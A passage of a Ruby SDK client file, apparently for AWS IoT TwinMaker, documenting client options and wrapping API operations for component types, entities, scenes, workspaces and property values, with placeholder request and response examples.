# a single request, including the initial attempt. For example,
# setting this value to 5 will result in a request being retried up to
# 4 times. Used in `standard` and `adaptive` retry modes.
#
# @option options [String] :profile ("default")
# Used when loading credentials from the shared credentials file
# at HOME/.aws/credentials. When not specified, 'default' is used.
#
# @option options [Proc] :retry_backoff
# A proc or lambda used for backoff. Defaults to 2**retries * retry_base_delay.
# This option is only used in the `legacy` retry mode.
#
# @option options [Float] :retry_base_delay (0.3)
# The base delay in seconds used by the default backoff function. This option
# is only used in the `legacy` retry mode.
#
# @option options [Symbol] :retry_jitter (:none)
# A delay randomiser function used by the default backoff function.
# Some predefined functions can be referenced by name - :none, :equal, :full,
# otherwise a Proc that takes and returns a number. This option is only used
# in the `legacy` retry mode.
#
# @see https://www.awsarchitectureblog.com/2015/03/backoff.html
#
# @option options [Integer] :retry_limit (3)
# The maximum number of times to retry failed requests. Only
# ~ 500 level server errors and certain ~ 400 level client errors
# are retried. Generally, these are throttling errors, data
# checksum errors, networking errors, timeout errors, auth errors,
# endpoint discovery, and errors from expired credentials.
# This option is only used in the `legacy` retry mode.
#
# @option options [Integer] :retry_max_delay (0)
# The maximum number of seconds to delay between retries (0 for no limit)
# used by the default backoff function. This option is only used in the
# `legacy` retry mode.
#
# @option options [String] :retry_mode ("legacy")
# Specifies which retry algorithm to use. Values are:
#
# * `legacy` - The pre-existing retry behavior. This is default value if
# no retry mode is provided.
#
# * `standard` - A standardized set of retry rules across the AWS SDKs.
# This includes support for retry quotas, which limit the number of
# unsuccessful retries a client can make.
#
# * `adaptive` - An experimental retry mode that includes all the
# functionality of `standard` mode along with automatic client side
# throttling. This is a provisional mode that may change behavior
# in the future.
#
#
# @option options [String] :secret_access_key
#
# @option options [String] :session_token
#
# @option options [Boolean] :stub_responses (false)
# Causes the client to return stubbed responses. By default
# fake responses are generated and returned. You can specify
# the response data to return or errors to raise by calling
# {ClientStubs#stub_responses}. See {ClientStubs} for more information.
#
# ** Please note ** When response stubbing is enabled, no HTTP
# requests are made, and retries are disabled.
#
# @option options [Boolean] :use_dualstack_endpoint
# When set to `true`, dualstack enabled endpoints (with `.aws` TLD)
# will be used if available.
#
# @option options [Boolean] :use_fips_endpoint
# When set to `true`, fips compatible endpoints will be used if available.
# When a `fips` region is used, the region is normalized and this config
# is set to `true`.
#
# @option options [Boolean] :validate_params (true)
# When `true`, request parameters are validated before
# sending the request.
#
# @option options [URI::HTTP,String] :http_proxy A proxy to send
# requests through. Formatted like 'http://proxy.com:123'.
#
# @option options [Float] :http_open_timeout (15) The number of
# seconds to wait when opening a HTTP session before raising a
# `Timeout::Error`.
#
# @option options [Float] :http_read_timeout (60) The default
# number of seconds to wait for response data. This value can
# safely be set per-request on the session.
#
# @option options [Float] :http_idle_timeout (5) The number of
# seconds a connection is allowed to sit idle before it is
# considered stale. Stale connections are closed and removed
# from the pool before making a request.
#
# @option options [Float] :http_continue_timeout (1) The number of
# seconds to wait for a 100-continue response before sending the
# request body. This option has no effect unless the request has
# "Expect" header set to "100-continue". Defaults to `nil` which
# disables this behaviour. This value can safely be set per
# request on the session.
#
# @option options [Float] :ssl_timeout (nil) Sets the SSL timeout
# in seconds.
#
# @option options [Boolean] :http_wire_trace (false) When `true`,
# HTTP debug output will be sent to the `:logger`.
#
# @option options [Boolean] :ssl_verify_peer (true) When `true`,
# SSL peer certificates are verified when establishing a
# connection.
#
# @option options [String] :ssl_ca_bundle Full path to the SSL
# certificate authority bundle file that should be used when
# verifying peer certificates. If you do not pass
# `:ssl_ca_bundle` or `:ssl_ca_directory` the system default
# will be used if available.
#
# @option options [String] :ssl_ca_directory Full path of the
# directory that contains the unbundled SSL certificate
# authority files for verifying peer certificates. If you do
# not pass `:ssl_ca_bundle` or `:ssl_ca_directory` the
# system default will be used if available.
#
def initialize(*args)
super
end
# @!group API Operations
# Sets values for multiple time series properties.
#
# @option params [required, Array<Types::PropertyValueEntry>] :entries
# An object that maps strings to the property value entries to set. Each
# string in the mapping must be unique to this object.
#
# @option params [required, String] :workspace_id
# The ID of the workspace that contains the properties to set.
#
# @return [Types::BatchPutPropertyValuesResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::BatchPutPropertyValuesResponse#error_entries #error_entries} => Array<Types::BatchPutPropertyErrorEntry>
#
# @example Request syntax with placeholder values
#
# resp = client.batch_put_property_values({
# entries: [ # required
# {
# entity_property_reference: { # required
# component_name: "Name",
# entity_id: "EntityId",
# external_id_property: {
# "String" => "String",
# },
# property_name: "Name", # required
# },
# property_values: [
# {
# time: "Time",
# timestamp: Time.now,
# value: { # required
# boolean_value: false,
# double_value: 1.0,
# expression: "Expression",
# integer_value: 1,
# list_value: [
# {
# # recursive DataValue
# },
# ],
# long_value: 1,
# map_value: {
# "String" => {
# # recursive DataValue
# },
# },
# relationship_value: {
# target_component_name: "Name",
# target_entity_id: "EntityId",
# },
# string_value: "String",
# },
# },
# ],
# },
# ],
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.error_entries #=> Array
# resp.error_entries[0].errors #=> Array
# resp.error_entries[0].errors[0].entry.entity_property_reference.component_name #=> String
# resp.error_entries[0].errors[0].entry.entity_property_reference.entity_id #=> String
# resp.error_entries[0].errors[0].entry.entity_property_reference.external_id_property #=> Hash
# resp.error_entries[0].errors[0].entry.entity_property_reference.external_id_property["String"] #=> String
# resp.error_entries[0].errors[0].entry.entity_property_reference.property_name #=> String
# resp.error_entries[0].errors[0].entry.property_values #=> Array
# resp.error_entries[0].errors[0].entry.property_values[0].time #=> String
# resp.error_entries[0].errors[0].entry.property_values[0].timestamp #=> Time
# resp.error_entries[0].errors[0].entry.property_values[0].value.boolean_value #=> Boolean
# resp.error_entries[0].errors[0].entry.property_values[0].value.double_value #=> Float
# resp.error_entries[0].errors[0].entry.property_values[0].value.expression #=> String
# resp.error_entries[0].errors[0].entry.property_values[0].value.integer_value #=> Integer
# resp.error_entries[0].errors[0].entry.property_values[0].value.list_value #=> Array
# resp.error_entries[0].errors[0].entry.property_values[0].value.list_value[0] #=> Types::DataValue
# resp.error_entries[0].errors[0].entry.property_values[0].value.long_value #=> Integer
# resp.error_entries[0].errors[0].entry.property_values[0].value.map_value #=> Hash
# resp.error_entries[0].errors[0].entry.property_values[0].value.map_value["String"] #=> Types::DataValue
# resp.error_entries[0].errors[0].entry.property_values[0].value.relationship_value.target_component_name #=> String
# resp.error_entries[0].errors[0].entry.property_values[0].value.relationship_value.target_entity_id #=> String
# resp.error_entries[0].errors[0].entry.property_values[0].value.string_value #=> String
# resp.error_entries[0].errors[0].error_code #=> String
# resp.error_entries[0].errors[0].error_message #=> String
#
# @overload batch_put_property_values(params = {})
# @param [Hash] params ({})
def batch_put_property_values(params = {}, options = {})
req = build_request(:batch_put_property_values, params)
req.send_request(options)
end
# Creates a component type.
#
# @option params [required, String] :component_type_id
# The ID of the component type.
#
# @option params [String] :description
# The description of the component type.
#
# @option params [Array<String>] :extends_from
# Specifies the parent component type to extend.
#
# @option params [Hash<String,Types::FunctionRequest>] :functions
# An object that maps strings to the functions in the component type.
# Each string in the mapping must be unique to this object.
#
# @option params [Boolean] :is_singleton
# A Boolean value that specifies whether an entity can have more than
# one component of this type.
#
# @option params [Hash<String,Types::PropertyDefinitionRequest>] :property_definitions
# An object that maps strings to the property definitions in the
# component type. Each string in the mapping must be unique to this
# object.
#
# @option params [Hash<String,String>] :tags
# Metadata that you can use to manage the component type.
#
# @option params [required, String] :workspace_id
# The ID of the workspace that contains the component type.
#
# @return [Types::CreateComponentTypeResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::CreateComponentTypeResponse#arn #arn} => String
# * {Types::CreateComponentTypeResponse#creation_date_time #creation_date_time} => Time
# * {Types::CreateComponentTypeResponse#state #state} => String
#
# @example Request syntax with placeholder values
#
# resp = client.create_component_type({
# component_type_id: "ComponentTypeId", # required
# description: "Description",
# extends_from: ["ComponentTypeId"],
# functions: {
# "Name" => {
# implemented_by: {
# is_native: false,
# lambda: {
# arn: "LambdaArn", # required
# },
# },
# required_properties: ["Name"],
# scope: "ENTITY", # accepts ENTITY, WORKSPACE
# },
# },
# is_singleton: false,
# property_definitions: {
# "Name" => {
# configuration: {
# "Name" => "Value",
# },
# data_type: {
# allowed_values: [
# {
# boolean_value: false,
# double_value: 1.0,
# expression: "Expression",
# integer_value: 1,
# list_value: {
# # recursive DataValueList
# },
# long_value: 1,
# map_value: {
# "String" => {
# # recursive DataValue
# },
# },
# relationship_value: {
# target_component_name: "Name",
# target_entity_id: "EntityId",
# },
# string_value: "String",
# },
# ],
# nested_type: {
# # recursive DataType
# },
# relationship: {
# relationship_type: "String",
# target_component_type_id: "ComponentTypeId",
# },
# type: "RELATIONSHIP", # required, accepts RELATIONSHIP, STRING, LONG, BOOLEAN, INTEGER, DOUBLE, LIST, MAP
# unit_of_measure: "String",
# },
# default_value: {
# boolean_value: false,
# double_value: 1.0,
# expression: "Expression",
# integer_value: 1,
# list_value: [
# {
# # recursive DataValue
# },
# ],
# long_value: 1,
# map_value: {
# "String" => {
# # recursive DataValue
# },
# },
# relationship_value: {
# target_component_name: "Name",
# target_entity_id: "EntityId",
# },
# string_value: "String",
# },
# is_external_id: false,
# is_required_in_entity: false,
# is_stored_externally: false,
# is_time_series: false,
# },
# },
# tags: {
# "TagKey" => "TagValue",
# },
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.arn #=> String
# resp.creation_date_time #=> Time
# resp.state #=> String, one of "CREATING", "UPDATING", "DELETING", "ACTIVE", "ERROR"
#
# @overload create_component_type(params = {})
# @param [Hash] params ({})
def create_component_type(params = {}, options = {})
req = build_request(:create_component_type, params)
req.send_request(options)
end
# Creates an entity.
#
# @option params [Hash<String,Types::ComponentRequest>] :components
# An object that maps strings to the components in the entity. Each
# string in the mapping must be unique to this object.
#
# @option params [String] :description
# The description of the entity.
#
# @option params [String] :entity_id
# The ID of the entity.
#
# @option params [required, String] :entity_name
# The name of the entity.
#
# @option params [String] :parent_entity_id
# The ID of the entity's parent entity.
#
# @option params [Hash<String,String>] :tags
# Metadata that you can use to manage the entity.
#
# @option params [required, String] :workspace_id
# The ID of the workspace that contains the entity.
#
# @return [Types::CreateEntityResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::CreateEntityResponse#arn #arn} => String
# * {Types::CreateEntityResponse#creation_date_time #creation_date_time} => Time
# * {Types::CreateEntityResponse#entity_id #entity_id} => String
# * {Types::CreateEntityResponse#state #state} => String
#
# @example Request syntax with placeholder values
#
# resp = client.create_entity({
# components: {
# "Name" => {
# component_type_id: "ComponentTypeId",
# description: "Description",
# properties: {
# "Name" => {
# definition: {
# configuration: {
# "Name" => "Value",
# },
# data_type: {
# allowed_values: [
# {
# boolean_value: false,
# double_value: 1.0,
# expression: "Expression",
# integer_value: 1,
# list_value: {
# # recursive DataValueList
# },
# long_value: 1,
# map_value: {
# "String" => {
# # recursive DataValue
# },
# },
# relationship_value: {
# target_component_name: "Name",
# target_entity_id: "EntityId",
# },
# string_value: "String",
# },
# ],
# nested_type: {
# # recursive DataType
# },
# relationship: {
# relationship_type: "String",
# target_component_type_id: "ComponentTypeId",
# },
# type: "RELATIONSHIP", # required, accepts RELATIONSHIP, STRING, LONG, BOOLEAN, INTEGER, DOUBLE, LIST, MAP
# unit_of_measure: "String",
# },
# default_value: {
# boolean_value: false,
# double_value: 1.0,
# expression: "Expression",
# integer_value: 1,
# list_value: [
# {
# # recursive DataValue
# },
# ],
# long_value: 1,
# map_value: {
# "String" => {
# # recursive DataValue
# },
# },
# relationship_value: {
# target_component_name: "Name",
# target_entity_id: "EntityId",
# },
# string_value: "String",
# },
# is_external_id: false,
# is_required_in_entity: false,
# is_stored_externally: false,
# is_time_series: false,
# },
# update_type: "UPDATE", # accepts UPDATE, DELETE, CREATE
# value: {
# boolean_value: false,
# double_value: 1.0,
# expression: "Expression",
# integer_value: 1,
# list_value: [
# {
# # recursive DataValue
# },
# ],
# long_value: 1,
# map_value: {
# "String" => {
# # recursive DataValue
# },
# },
# relationship_value: {
# target_component_name: "Name",
# target_entity_id: "EntityId",
# },
# string_value: "String",
# },
# },
# },
# },
# },
# description: "Description",
# entity_id: "EntityId",
# entity_name: "EntityName", # required
# parent_entity_id: "ParentEntityId",
# tags: {
# "TagKey" => "TagValue",
# },
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.arn #=> String
# resp.creation_date_time #=> Time
# resp.entity_id #=> String
# resp.state #=> String, one of "CREATING", "UPDATING", "DELETING", "ACTIVE", "ERROR"
#
# @overload create_entity(params = {})
# @param [Hash] params ({})
def create_entity(params = {}, options = {})
req = build_request(:create_entity, params)
req.send_request(options)
end
# Creates a scene.
#
# @option params [Array<String>] :capabilities
# A list of capabilities that the scene uses to render itself.
#
# @option params [required, String] :content_location
# The relative path that specifies the location of the content
# definition file.
#
# @option params [String] :description
# The description for this scene.
#
# @option params [required, String] :scene_id
# The ID of the scene.
#
# @option params [Hash<String,String>] :tags
# Metadata that you can use to manage the scene.
#
# @option params [required, String] :workspace_id
# The ID of the workspace that contains the scene.
#
# @return [Types::CreateSceneResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::CreateSceneResponse#arn #arn} => String
# * {Types::CreateSceneResponse#creation_date_time #creation_date_time} => Time
#
# @example Request syntax with placeholder values
#
# resp = client.create_scene({
# capabilities: ["SceneCapability"],
# content_location: "S3Url", # required
# description: "Description",
# scene_id: "Id", # required
# tags: {
# "TagKey" => "TagValue",
# },
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.arn #=> String
# resp.creation_date_time #=> Time
#
# @overload create_scene(params = {})
# @param [Hash] params ({})
def create_scene(params = {}, options = {})
req = build_request(:create_scene, params)
req.send_request(options)
end
# Creates a workspace.
#
# @option params [String] :description
# The description of the workspace.
#
# @option params [required, String] :role
# The ARN of the execution role associated with the workspace.
#
# @option params [required, String] :s3_location
# The ARN of the S3 bucket where resources associated with the workspace
# are stored.
#
# @option params [Hash<String,String>] :tags
# Metadata that you can use to manage the workspace.
#
# @option params [required, String] :workspace_id
# The ID of the workspace.
#
# @return [Types::CreateWorkspaceResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::CreateWorkspaceResponse#arn #arn} => String
# * {Types::CreateWorkspaceResponse#creation_date_time #creation_date_time} => Time
#
# @example Request syntax with placeholder values
#
# resp = client.create_workspace({
# description: "Description",
# role: "RoleArn", # required
# s3_location: "S3Location", # required
# tags: {
# "TagKey" => "TagValue",
# },
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.arn #=> String
# resp.creation_date_time #=> Time
#
# @overload create_workspace(params = {})
# @param [Hash] params ({})
def create_workspace(params = {}, options = {})
req = build_request(:create_workspace, params)
req.send_request(options)
end
# Deletes a component type.
#
# @option params [required, String] :component_type_id
# The ID of the component type to delete.
#
# @option params [required, String] :workspace_id
# The ID of the workspace that contains the component type.
#
# @return [Types::DeleteComponentTypeResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DeleteComponentTypeResponse#state #state} => String
#
# @example Request syntax with placeholder values
#
# resp = client.delete_component_type({
# component_type_id: "ComponentTypeId", # required
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.state #=> String, one of "CREATING", "UPDATING", "DELETING", "ACTIVE", "ERROR"
#
# @overload delete_component_type(params = {})
# @param [Hash] params ({})
def delete_component_type(params = {}, options = {})
req = build_request(:delete_component_type, params)
req.send_request(options)
end
# Deletes an entity.
#
# @option params [required, String] :entity_id
# The ID of the entity to delete.
#
# @option params [Boolean] :is_recursive
# A Boolean value that specifies whether the operation deletes child
# entities.
#
# @option params [required, String] :workspace_id
# The ID of the workspace that contains the entity to delete.
#
# @return [Types::DeleteEntityResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DeleteEntityResponse#state #state} => String
#
# @example Request syntax with placeholder values
#
# resp = client.delete_entity({
# entity_id: "EntityId", # required
# is_recursive: false,
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.state #=> String, one of "CREATING", "UPDATING", "DELETING", "ACTIVE", "ERROR"
#
# @overload delete_entity(params = {})
# @param [Hash] params ({})
def delete_entity(params = {}, options = {})
req = build_request(:delete_entity, params)
req.send_request(options)
end
# Deletes a scene.
#
# @option params [required, String] :scene_id
# The ID of the scene to delete.
#
# @option params [required, String] :workspace_id
# The ID of the workspace.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.delete_scene({
# scene_id: "Id", # required
# workspace_id: "Id", # required
# })
#
# @overload delete_scene(params = {})
# @param [Hash] params ({})
def delete_scene(params = {}, options = {})
req = build_request(:delete_scene, params)
req.send_request(options)
end
# Deletes a workspace.
#
# @option params [required, String] :workspace_id
# The ID of the workspace to delete.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.delete_workspace({
# workspace_id: "Id", # required
# })
#
# @overload delete_workspace(params = {})
# @param [Hash] params ({})
def delete_workspace(params = {}, options = {})
req = build_request(:delete_workspace, params)
req.send_request(options)
end
# Retrieves information about a component type.
#
# @option params [required, String] :component_type_id
# The ID of the component type.
#
# @option params [required, String] :workspace_id
# The ID of the workspace that contains the component type.
#
# @return [Types::GetComponentTypeResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetComponentTypeResponse#arn #arn} => String
# * {Types::GetComponentTypeResponse#component_type_id #component_type_id} => String
# * {Types::GetComponentTypeResponse#creation_date_time #creation_date_time} => Time
# * {Types::GetComponentTypeResponse#description #description} => String
# * {Types::GetComponentTypeResponse#extends_from #extends_from} => Array<String>
# * {Types::GetComponentTypeResponse#functions #functions} => Hash<String,Types::FunctionResponse>
# * {Types::GetComponentTypeResponse#is_abstract #is_abstract} => Boolean
# * {Types::GetComponentTypeResponse#is_schema_initialized #is_schema_initialized} => Boolean
# * {Types::GetComponentTypeResponse#is_singleton #is_singleton} => Boolean
# * {Types::GetComponentTypeResponse#property_definitions #property_definitions} => Hash<String,Types::PropertyDefinitionResponse>
# * {Types::GetComponentTypeResponse#status #status} => Types::Status
# * {Types::GetComponentTypeResponse#update_date_time #update_date_time} => Time
# * {Types::GetComponentTypeResponse#workspace_id #workspace_id} => String
#
# @example Request syntax with placeholder values
#
# resp = client.get_component_type({
# component_type_id: "ComponentTypeId", # required
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.arn #=> String
# resp.component_type_id #=> String
# resp.creation_date_time #=> Time
# resp.description #=> String
# resp.extends_from #=> Array
# resp.extends_from[0] #=> String
# resp.functions #=> Hash
# resp.functions["Name"].implemented_by.is_native #=> Boolean
# resp.functions["Name"].implemented_by.lambda.arn #=> String
# resp.functions["Name"].is_inherited #=> Boolean
# resp.functions["Name"].required_properties #=> Array
# resp.functions["Name"].required_properties[0] #=> String
# resp.functions["Name"].scope #=> String, one of "ENTITY", "WORKSPACE"
# resp.is_abstract #=> Boolean
# resp.is_schema_initialized #=> Boolean
# resp.is_singleton #=> Boolean
# resp.property_definitions #=> Hash
# resp.property_definitions["Name"].configuration #=> Hash
# resp.property_definitions["Name"].configuration["Name"] #=> String
# resp.property_definitions["Name"].data_type.allowed_values #=> Array
# resp.property_definitions["Name"].data_type.allowed_values[0].boolean_value #=> Boolean
# resp.property_definitions["Name"].data_type.allowed_values[0].double_value #=> Float
# resp.property_definitions["Name"].data_type.allowed_values[0].expression #=> String
# resp.property_definitions["Name"].data_type.allowed_values[0].integer_value #=> Integer
# resp.property_definitions["Name"].data_type.allowed_values[0].list_value #=> Types::DataValueList
# resp.property_definitions["Name"].data_type.allowed_values[0].long_value #=> Integer
# resp.property_definitions["Name"].data_type.allowed_values[0].map_value #=> Hash
# resp.property_definitions["Name"].data_type.allowed_values[0].map_value["String"] #=> Types::DataValue
# resp.property_definitions["Name"].data_type.allowed_values[0].relationship_value.target_component_name #=> String
# resp.property_definitions["Name"].data_type.allowed_values[0].relationship_value.target_entity_id #=> String
# resp.property_definitions["Name"].data_type.allowed_values[0].string_value #=> String
# resp.property_definitions["Name"].data_type.nested_type #=> Types::DataType
# resp.property_definitions["Name"].data_type.relationship.relationship_type #=> String
# resp.property_definitions["Name"].data_type.relationship.target_component_type_id #=> String
# resp.property_definitions["Name"].data_type.type #=> String, one of "RELATIONSHIP", "STRING", "LONG", "BOOLEAN", "INTEGER", "DOUBLE", "LIST", "MAP"
# resp.property_definitions["Name"].data_type.unit_of_measure #=> String
# resp.property_definitions["Name"].default_value.boolean_value #=> Boolean
# resp.property_definitions["Name"].default_value.double_value #=> Float
# resp.property_definitions["Name"].default_value.expression #=> String
# resp.property_definitions["Name"].default_value.integer_value #=> Integer
# resp.property_definitions["Name"].default_value.list_value #=> Array
# resp.property_definitions["Name"].default_value.list_value[0] #=> Types::DataValue
# resp.property_definitions["Name"].default_value.long_value #=> Integer
# resp.property_definitions["Name"].default_value.map_value #=> Hash
# resp.property_definitions["Name"].default_value.map_value["String"] #=> Types::DataValue
# resp.property_definitions["Name"].default_value.relationship_value.target_component_name #=> String
# resp.property_definitions["Name"].default_value.relationship_value.target_entity_id #=> String
# resp.property_definitions["Name"].default_value.string_value #=> String
# resp.property_definitions["Name"].is_external_id #=> Boolean
# resp.property_definitions["Name"].is_final #=> Boolean
# resp.property_definitions["Name"].is_imported #=> Boolean
# resp.property_definitions["Name"].is_inherited #=> Boolean
# resp.property_definitions["Name"].is_required_in_entity #=> Boolean
# resp.property_definitions["Name"].is_stored_externally #=> Boolean
# resp.property_definitions["Name"].is_time_series #=> Boolean
# resp.status.error.code #=> String, one of "VALIDATION_ERROR", "INTERNAL_FAILURE"
# resp.status.error.message #=> String
# resp.status.state #=> String, one of "CREATING", "UPDATING", "DELETING", "ACTIVE", "ERROR"
# resp.update_date_time #=> Time
# resp.workspace_id #=> String
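    #
    # A hedged usage sketch (not from the generated SDK docs): it reads only the
    # response fields shown above, and the workspace and component type IDs are
    # placeholders.
    #
    # @example Inspect the property definitions of a component type
    #
    #   resp = client.get_component_type({
    #     component_type_id: "my.component.type", # placeholder ID
    #     workspace_id: "MyWorkspace",            # placeholder ID
    #   })
    #   resp.property_definitions.each do |name, definition|
    #     puts "#{name}: #{definition.data_type.type}"
    #   end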
#
# @overload get_component_type(params = {})
# @param [Hash] params ({})
def get_component_type(params = {}, options = {})
req = build_request(:get_component_type, params)
req.send_request(options)
end
# Retrieves information about an entity.
#
# @option params [required, String] :entity_id
# The ID of the entity.
#
# @option params [required, String] :workspace_id
# The ID of the workspace.
#
# @return [Types::GetEntityResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetEntityResponse#arn #arn} => String
# * {Types::GetEntityResponse#components #components} => Hash<String,Types::ComponentResponse>
# * {Types::GetEntityResponse#creation_date_time #creation_date_time} => Time
# * {Types::GetEntityResponse#description #description} => String
# * {Types::GetEntityResponse#entity_id #entity_id} => String
# * {Types::GetEntityResponse#entity_name #entity_name} => String
# * {Types::GetEntityResponse#has_child_entities #has_child_entities} => Boolean
# * {Types::GetEntityResponse#parent_entity_id #parent_entity_id} => String
# * {Types::GetEntityResponse#status #status} => Types::Status
# * {Types::GetEntityResponse#update_date_time #update_date_time} => Time
# * {Types::GetEntityResponse#workspace_id #workspace_id} => String
#
# @example Request syntax with placeholder values
#
# resp = client.get_entity({
# entity_id: "EntityId", # required
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.arn #=> String
# resp.components #=> Hash
# resp.components["Name"].component_name #=> String
# resp.components["Name"].component_type_id #=> String
# resp.components["Name"].defined_in #=> String
# resp.components["Name"].description #=> String
# resp.components["Name"].properties #=> Hash
# resp.components["Name"].properties["Name"].definition.configuration #=> Hash
# resp.components["Name"].properties["Name"].definition.configuration["Name"] #=> String
# resp.components["Name"].properties["Name"].definition.data_type.allowed_values #=> Array
# resp.components["Name"].properties["Name"].definition.data_type.allowed_values[0].boolean_value #=> Boolean
# resp.components["Name"].properties["Name"].definition.data_type.allowed_values[0].double_value #=> Float
# resp.components["Name"].properties["Name"].definition.data_type.allowed_values[0].expression #=> String
# resp.components["Name"].properties["Name"].definition.data_type.allowed_values[0].integer_value #=> Integer
# resp.components["Name"].properties["Name"].definition.data_type.allowed_values[0].list_value #=> Types::DataValueList
# resp.components["Name"].properties["Name"].definition.data_type.allowed_values[0].long_value #=> Integer
# resp.components["Name"].properties["Name"].definition.data_type.allowed_values[0].map_value #=> Hash
# resp.components["Name"].properties["Name"].definition.data_type.allowed_values[0].map_value["String"] #=> Types::DataValue
# resp.components["Name"].properties["Name"].definition.data_type.allowed_values[0].relationship_value.target_component_name #=> String
# resp.components["Name"].properties["Name"].definition.data_type.allowed_values[0].relationship_value.target_entity_id #=> String
# resp.components["Name"].properties["Name"].definition.data_type.allowed_values[0].string_value #=> String
# resp.components["Name"].properties["Name"].definition.data_type.nested_type #=> Types::DataType
# resp.components["Name"].properties["Name"].definition.data_type.relationship.relationship_type #=> String
# resp.components["Name"].properties["Name"].definition.data_type.relationship.target_component_type_id #=> String
# resp.components["Name"].properties["Name"].definition.data_type.type #=> String, one of "RELATIONSHIP", "STRING", "LONG", "BOOLEAN", "INTEGER", "DOUBLE", "LIST", "MAP"
# resp.components["Name"].properties["Name"].definition.data_type.unit_of_measure #=> String
# resp.components["Name"].properties["Name"].definition.default_value.boolean_value #=> Boolean
# resp.components["Name"].properties["Name"].definition.default_value.double_value #=> Float
# resp.components["Name"].properties["Name"].definition.default_value.expression #=> String
# resp.components["Name"].properties["Name"].definition.default_value.integer_value #=> Integer
# resp.components["Name"].properties["Name"].definition.default_value.list_value #=> Array
# resp.components["Name"].properties["Name"].definition.default_value.list_value[0] #=> Types::DataValue
# resp.components["Name"].properties["Name"].definition.default_value.long_value #=> Integer
# resp.components["Name"].properties["Name"].definition.default_value.map_value #=> Hash
# resp.components["Name"].properties["Name"].definition.default_value.map_value["String"] #=> Types::DataValue
# resp.components["Name"].properties["Name"].definition.default_value.relationship_value.target_component_name #=> String
# resp.components["Name"].properties["Name"].definition.default_value.relationship_value.target_entity_id #=> String
# resp.components["Name"].properties["Name"].definition.default_value.string_value #=> String
# resp.components["Name"].properties["Name"].definition.is_external_id #=> Boolean
# resp.components["Name"].properties["Name"].definition.is_final #=> Boolean
# resp.components["Name"].properties["Name"].definition.is_imported #=> Boolean
# resp.components["Name"].properties["Name"].definition.is_inherited #=> Boolean
# resp.components["Name"].properties["Name"].definition.is_required_in_entity #=> Boolean
# resp.components["Name"].properties["Name"].definition.is_stored_externally #=> Boolean
# resp.components["Name"].properties["Name"].definition.is_time_series #=> Boolean
# resp.components["Name"].properties["Name"].value.boolean_value #=> Boolean
# resp.components["Name"].properties["Name"].value.double_value #=> Float
# resp.components["Name"].properties["Name"].value.expression #=> String
# resp.components["Name"].properties["Name"].value.integer_value #=> Integer
# resp.components["Name"].properties["Name"].value.list_value #=> Array
# resp.components["Name"].properties["Name"].value.list_value[0] #=> Types::DataValue
# resp.components["Name"].properties["Name"].value.long_value #=> Integer
# resp.components["Name"].properties["Name"].value.map_value #=> Hash
# resp.components["Name"].properties["Name"].value.map_value["String"] #=> Types::DataValue
# resp.components["Name"].properties["Name"].value.relationship_value.target_component_name #=> String
# resp.components["Name"].properties["Name"].value.relationship_value.target_entity_id #=> String
# resp.components["Name"].properties["Name"].value.string_value #=> String
# resp.components["Name"].status.error.code #=> String, one of "VALIDATION_ERROR", "INTERNAL_FAILURE"
# resp.components["Name"].status.error.message #=> String
# resp.components["Name"].status.state #=> String, one of "CREATING", "UPDATING", "DELETING", "ACTIVE", "ERROR"
# resp.creation_date_time #=> Time
# resp.description #=> String
# resp.entity_id #=> String
# resp.entity_name #=> String
# resp.has_child_entities #=> Boolean
# resp.parent_entity_id #=> String
# resp.status.error.code #=> String, one of "VALIDATION_ERROR", "INTERNAL_FAILURE"
# resp.status.error.message #=> String
# resp.status.state #=> String, one of "CREATING", "UPDATING", "DELETING", "ACTIVE", "ERROR"
# resp.update_date_time #=> Time
# resp.workspace_id #=> String
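    #
    # A hedged usage sketch (not from the generated SDK docs); the entity,
    # component, and property names below are placeholders.
    #
    # @example Read one component property value from the response
    #
    #   resp = client.get_entity({
    #     entity_id: "my-entity-id",   # placeholder ID
    #     workspace_id: "MyWorkspace", # placeholder ID
    #   })
    #   component = resp.components["myComponent"]
    #   if component
    #     property = component.properties["temperature"]
    #     puts property.value.double_value if property
    #   end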
#
# @overload get_entity(params = {})
# @param [Hash] params ({})
def get_entity(params = {}, options = {})
req = build_request(:get_entity, params)
req.send_request(options)
end
# Gets the property values for a component, component type, entity, or
# workspace.
#
# You must specify a value for either `componentName`,
# `componentTypeId`, `entityId`, or `workspaceId`.
#
# @option params [String] :component_name
# The name of the component whose property values the operation returns.
#
# @option params [String] :component_type_id
# The ID of the component type whose property values the operation
# returns.
#
# @option params [String] :entity_id
# The ID of the entity whose property values the operation returns.
#
# @option params [required, Array<String>] :selected_properties
# The properties whose values the operation returns.
#
# @option params [required, String] :workspace_id
# The ID of the workspace whose values the operation returns.
#
# @return [Types::GetPropertyValueResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetPropertyValueResponse#property_values #property_values} => Hash<String,Types::PropertyLatestValue>
#
# @example Request syntax with placeholder values
#
# resp = client.get_property_value({
# component_name: "Name",
# component_type_id: "ComponentTypeId",
# entity_id: "EntityId",
# selected_properties: ["String"], # required
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.property_values #=> Hash
# resp.property_values["Name"].property_reference.component_name #=> String
